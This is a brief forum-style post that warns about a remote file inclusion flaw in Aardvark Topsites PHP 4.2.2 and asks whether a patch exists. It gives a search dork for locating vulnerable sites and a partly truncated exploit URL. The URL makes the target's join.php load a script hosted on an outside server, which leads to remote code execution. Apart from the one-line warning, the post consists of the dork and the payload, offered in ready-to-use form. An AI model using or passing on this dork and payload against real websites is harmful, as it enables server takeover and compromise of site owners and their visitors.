WATCH out for these and tell me if you have developed a method/patch for fixing them, these exploits are highly volatile. Title: Aardvark Topsites PHP 4.2.2 remote file inclusion URL: http://www.aardvarktopsitesphp.com/ Dork: "Powered By Aardvark Topsites PHP 4.2.2" Exploit: /sources/join.php?FORM=owned&CONFIG[captcha]=1&CONFIG[pat...enda=http://www.yourspace.com/yourscript.txt?